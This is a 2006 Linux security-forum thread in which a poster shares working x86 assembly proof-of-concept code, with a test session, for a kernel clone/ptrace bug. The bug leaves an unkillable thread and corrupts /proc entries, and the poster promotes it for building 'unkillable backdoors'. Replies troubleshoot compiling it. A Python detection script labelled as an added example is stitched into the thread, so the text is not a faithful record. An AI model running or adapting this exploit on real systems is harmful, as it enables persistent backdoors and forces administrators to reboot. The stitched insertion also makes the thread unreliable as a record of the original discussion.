Waraxe IT Security Portal  
www.waraxe.us Forum Index -> Linux world

NEW! Unkillable thread + procfs corruption
Posted: Tue Jan 10, 2006 4:28 pm by erg0t (Valuable expert; Joined: Apr 08, 2005; Posts: 55; Location: Uruguay)

This is a new PoC of the old bug I found; now it can run the thread!!!
And in the old bug the thread could be killed by re-attaching it; now it can't!!!
And one more thing: some of the ProcFS info is corrupted, so you can't see some things such as maps, mem, and tasks.
I'm testing on a 2.6.11; last time, on a 2.6.13, the old version worked.
A friend told me that in 2.6.14 you can kill it :(
Please try it and post your results!
This bug can be used to code unkillable backdoors, forcing the admin to reboot.

Code:

[global main]                   ; was missing from the pasted nasm -e output (see erg0t's later post)

CLONE_VM      equ 0x00000100
CLONE_THREAD  equ 0x00010000
CLONE_SIGHAND equ 0x00000800
SIGCHLD       equ 17

[extern printf]

[section .data]
forked db " >> fork: %d",10,0

[section .text]
; Parent side of fork(): print the child's PID and exit(0).
no_child:
    push eax                    ; child pid returned by fork
    push forked
    call printf
    xor ebx, ebx                ; exit status 0
    mov eax, 1                  ; sys_exit
    call 0xffffe400             ; __kernel_vsyscall entry in the 2.6 vsyscall page

; clone() failed: report it and exit(-1).
bad:
[section .data]
..@4.cadena: db " !! Can't create thread",10
[section .text]
    mov ebx, 1                  ; fd 1 (stdout)
    mov ecx, ..@4.cadena
    mov edx, 23+1               ; length including the newline
    mov eax, 4                  ; sys_write
    call 0xffffe400
    mov ebx, -1
    mov eax, 1                  ; sys_exit
    call 0xffffe400

main:
    mov eax, 2                  ; sys_fork
    call 0xffffe400
    test eax, eax
    jnz no_child                ; parent gets the child pid, child gets 0
[section .data]
..@13.cadena: db " >> Creating thread...",10
[section .text]
    mov ebx, 1
    mov ecx, ..@13.cadena
    mov edx, 22+1
    mov eax, 4                  ; sys_write
    call 0xffffe400
    ; Child: create a thread in its own thread group, sharing memory and
    ; signal handlers, with no separate stack (ecx = NULL child stack).
    mov ebx, CLONE_VM | CLONE_THREAD | CLONE_SIGHAND | SIGCHLD
    xor ecx, ecx
    mov eax, 120                ; sys_clone
    call 0xffffe400
    test eax, eax
    jz child                    ; eax = 0: we are the new thread
    test eax, 0x80000000        ; negative return = -errno
    jnz bad
    xor ebx, ebx                ; thread group leader exits(0) while the
    mov eax, 1                  ; sys_exit: new thread keeps running
    call 0xffffe400

; The new thread: request to be traced (PTRACE_TRACEME), then spin forever.
child:
    xor ebx, ebx                ; PTRACE_TRACEME
    mov eax, 26                 ; sys_ptrace
    call 0xffffe400
    test eax, eax
    jnz bad2
[section .data]
..@26.cadena: db " >> Thread attached and running",10
[section .text]
    mov ebx, 1
    mov ecx, ..@26.cadena
    mov edx, 31+1
    mov eax, 4                  ; sys_write
    call 0xffffe400
aki: jmp aki                    ; busy loop, never returns

; ptrace() failed: report it and exit(-1).
bad2:
[section .data]
..@32.cadena: db " !! Can't attach",10
[section .text]
    mov ebx, 1
    mov ecx, ..@32.cadena
    mov edx, 16+1
    mov eax, 4                  ; sys_write
    call 0xffffe400
    mov ebx, -1
    mov eax, 1                  ; sys_exit
    call 0xffffe400


Code:

erg0t nasm # nasm -felf test.asm ; gcc test.o -o test ; ./test
>> Creating thread...
>> fork: 8407
erg0t nasm # >> Thread attached and running
killall -9 test ; ps -A | grep test
8407 pts/0 00:00:27 test <defunct>
erg0t nasm # ls /proc/8407
auxv cmdline cwd environ exe fd maps mem mounts oom_adj oom_score root stat statm status task
erg0t nasm # cat /proc/8407/*
cat: /proc/8407/cwd: No existe el fichero o el directorio
cat: /proc/8407/exe: No existe el fichero o el directorio
cat: /proc/8407/fd: No existe el fichero o el directorio
cat: /proc/8407/mem: No existe el fichero o el directorio
cat: /proc/8407/mounts: Argumento inválido
0
0
cat: /proc/8407/root: No existe el fichero o el directorio
8407 (test) Z 1 8406 7842 34816 8417 76 1 0 0 0 2764 5 0 0 17 0 2 0 1002050 0 0 4294967295 0 0 0 0 0 256 0 0 0 4294967295 0 0 17 0 0 0
0 0 0 0 0 0 0
Name: test
State: Z (zombie)
SleepAVG: 58%
Tgid: 8407
Pid: 8407
PPid: 1
TracerPid: 0
Uid: 0 0 0 0
Gid: 0 0 0 0
FDSize: 0
Groups: 0 1 2 3 4 6 10 11 20 26 27
Threads: 2
SigPnd: 0000000000000100
ShdPnd: 0000000000000100
SigBlk: 0000000080000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 0000000000000000
CapPrm: 00000000fffffeff
CapEff: 00000000fffffeff
cat: /proc/8407/task: No existe el fichero o el directorio
erg0t nasm # uname -a
Linux erg0t 2.6.11 #1 Tue Dec 13 19:38:25 GMT 2005 i686 AMD Athlon(tm) XP 2000+ AuthenticAMD GNU/Linux
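The session above is the only artefact an administrator gets to see: a task reported as a zombie that still counts two threads, a SIGKILL that stays pending, and a handful of /proc entries that cannot be read. The following Python script is an added example written for this page; it is not code from the thread or from erg0t. It parses the /proc/<pid>/status text and the cat errors pasted above (embedded as constructed samples) and flags the combination shown there. The rule "State: Z with Threads > 1 is suspicious" is an assumption drawn from that output, not a kernel invariant the post states; scan_proc() applies the same rule to a live /proc tree.

```python
"""Spot a zombie thread-group leader that still reports live threads.

Added example, not code from the thread or from erg0t: it parses the
/proc/<pid>/status text and the 'cat /proc/<pid>/*' errors pasted in the post
and flags the combination shown there (State: Z, Threads: 2, SIGKILL still
pending, several procfs entries unreadable). scan_proc() applies the same
heuristic (an assumption, not a kernel rule) to a real /proc tree.
"""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed sample: the /proc/8407/status block from the post.
SAMPLE_STATUS = """\
Name:\ttest
State:\tZ (zombie)
SleepAVG:\t58%
Tgid:\t8407
Pid:\t8407
PPid:\t1
TracerPid:\t0
Uid:\t0\t0\t0\t0
Gid:\t0\t0\t0\t0
FDSize:\t0
Groups:\t0 1 2 3 4 6 10 11 20 26 27
Threads:\t2
SigPnd:\t0000000000000100
ShdPnd:\t0000000000000100
SigBlk:\t0000000080000000
"""

# Constructed sample: the 'cat /proc/8407/*' error lines from the post (Spanish locale).
SAMPLE_CAT_ERRORS = """\
cat: /proc/8407/cwd: No existe el fichero o el directorio
cat: /proc/8407/exe: No existe el fichero o el directorio
cat: /proc/8407/fd: No existe el fichero o el directorio
cat: /proc/8407/mem: No existe el fichero o el directorio
cat: /proc/8407/mounts: Argumento inválido
cat: /proc/8407/root: No existe el fichero o el directorio
cat: /proc/8407/task: No existe el fichero o el directorio
"""

SIGKILL = 9


@dataclass
class Finding:
    pid: int
    state: str
    threads: int
    pending: int                       # SigPnd bitmask: bit n-1 set = signal n pending
    broken_entries: List[str] = field(default_factory=list)

    @property
    def pending_signals(self) -> List[int]:
        return [n + 1 for n in range(64) if (self.pending >> n) & 1]

    @property
    def suspicious(self) -> bool:
        # Heuristic (assumption): a zombie leader still counting more than one
        # thread means a clone()d thread outlived its exited leader.
        return self.state.startswith("Z") and self.threads > 1


def parse_status(text: str) -> Dict[str, str]:
    """Turn the 'Key:<tab>value' lines of /proc/<pid>/status into a dict."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def broken_proc_entries(cat_output: str) -> List[str]:
    """Names of the /proc/<pid>/<entry> files that cat failed to read."""
    pat = re.compile(r"^cat: /proc/\d+/([^:/]+): ")
    names = []
    for line in cat_output.splitlines():
        m = pat.match(line)
        if m:
            names.append(m.group(1))
    return names


def analyse(status_text: str, cat_errors: str = "") -> Finding:
    s = parse_status(status_text)
    return Finding(
        pid=int(s["Pid"]),
        state=s.get("State", "?"),
        threads=int(s.get("Threads", "1")),
        pending=int(s.get("SigPnd", "0"), 16),
        broken_entries=broken_proc_entries(cat_errors),
    )


def scan_proc(root: str = "/proc") -> List[Finding]:
    """Return suspicious findings for every numeric directory under root."""
    found = []
    for name in os.listdir(root):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(root, name, "status"), encoding="utf-8", errors="replace") as fh:
                f = analyse(fh.read())
        except (OSError, KeyError, ValueError):
            continue                    # task vanished or status unreadable
        if f.suspicious:
            found.append(f)
    return found


if __name__ == "__main__":
    f = analyse(SAMPLE_STATUS, SAMPLE_CAT_ERRORS)
    print(f"pid {f.pid}: {f.state}, threads={f.threads}, suspicious={f.suspicious}")
    print("pending signals:", f.pending_signals, "(9 = SIGKILL, still undelivered)")
    print("unreadable procfs entries:", f.broken_entries)
    if os.path.isdir("/proc"):
        for live in scan_proc():
            print("live system:", live)
```

The SigPnd mask in the pasted output decodes to signal 9, so the script also makes visible that the killall -9 was queued but never acted on; on a live system a hit from scan_proc() is a candidate for exactly the reboot-only situation the post describes.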
Posted: Tue Jan 10, 2006 5:33 pm by erg0t

well, I did some more tests, and the thread is terminated, but the structures are still there, so it is really killed :(
I will try to do some more tests to see if I can find a way to keep the thread running
Posted: Wed Jan 11, 2006 10:41 am by fizzi (Advanced user; Joined: Sep 14, 2005; Posts: 55)

hi
I tried to compile your prog under amd64 but it didn't work. I've got kernel 2.6.15 and I get
Code:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'

perhaps you can tell me how to get this thing compiled for amd64 or 32bit arch.
Posted: Wed Jan 11, 2006 2:42 pm by erg0t

fizzi wrote:
hi
I tried to compile your prog under amd64 but it didn't work. I've got kernel 2.6.15 and I get
Code:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'

perhaps you can tell me how to get this thing compiled for amd64 or 32bit arch.


It's only for x86.
Posted: Wed Jan 11, 2006 3:09 pm by fizzi

yeah, but isn't amd64 compatible with 32bit programs?
so this should also work on my x86_64 architecture, but it just won't compile.
Posted: Thu Jan 12, 2006 1:21 am by shai-tan (Valuable expert; Joined: Feb 22, 2005; Posts: 477)

Hey erg0t, how's everything holding up? Ah, isn't assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up with the likes of the new GNU/Hurd kernel.


Shai-tan

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Posted: Thu Jan 12, 2006 3:32 pm by erg0t

shai-tan wrote:
Hey erg0t, how's everything holding up? Ah, isn't assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up with the likes of the new GNU/Hurd kernel.


Shai-tan


Hi, I have NASM version 0.98.39 compiled on Dec 15 2005 and
gcc versión 3.3.6 (Gentoo 3.3.6, ssp-3.3.6-1.0, pie-8.7.8)

btw I sent a patch for another bug in clone and it was added to the -mm tree.
It's called i386-sys_clone-from-vsyscall.patch
I'm very happy :D
Posted: Thu Jan 12, 2006 5:21 pm by shai-tan

Ah, maybe it's gcc 4.0 which is breaking it.

Shai-tan

Posted: Thu Jan 12, 2006 7:29 pm by fizzi

shai-tan wrote:
Hey erg0t, how's everything holding up? Ah, isn't assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up with the likes of the new GNU/Hurd kernel.


Shai-tan


As I can see, this is the same error message I get when I try to compile this thingy, but I've got amd64 and gcc 3.4.4.
"undefined reference to main" ... seems it can't find the main routine. So ... any other linker or compiler I can choose?
Posted: Thu Jan 12, 2006 7:37 pm by fizzi

Code:
gcc -nostartfiles -o test test.o
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output

Ok, I'm getting closer ...
Posted: Thu Jan 12, 2006 7:47 pm by fizzi

Code:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

I give up
Posted: Thu Jan 12, 2006 8:07 pm by erg0t

fizzi wrote:
Code:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

I give up


The problem is that nasm generates code only for x86; maybe you can convert the code to gas.
Posted: Fri Jan 13, 2006 6:05 am by shai-tan

Well I use x86 and why is it not working?

Shai-tan

Posted: Fri Jan 13, 2006 10:02 am by erg0t

shai-tan wrote:
Well I use x86 and why is it not working?

Shai-tan


Sorry, I know what is happening: I use a lot of macros I made for my code, so to get code that everyone could compile I used nasm -e and posted the output, but by mistake I didn't select one line before it containing [global main]. So to get the code working you have to add global main to the top of the code.
Posted: Fri Jan 13, 2006 10:17 am by shai-tan

Ah I see.

Thanks. I'll get round to it later because I'm a bit busy tonight. I'll tell you what happens.


Shai-tan
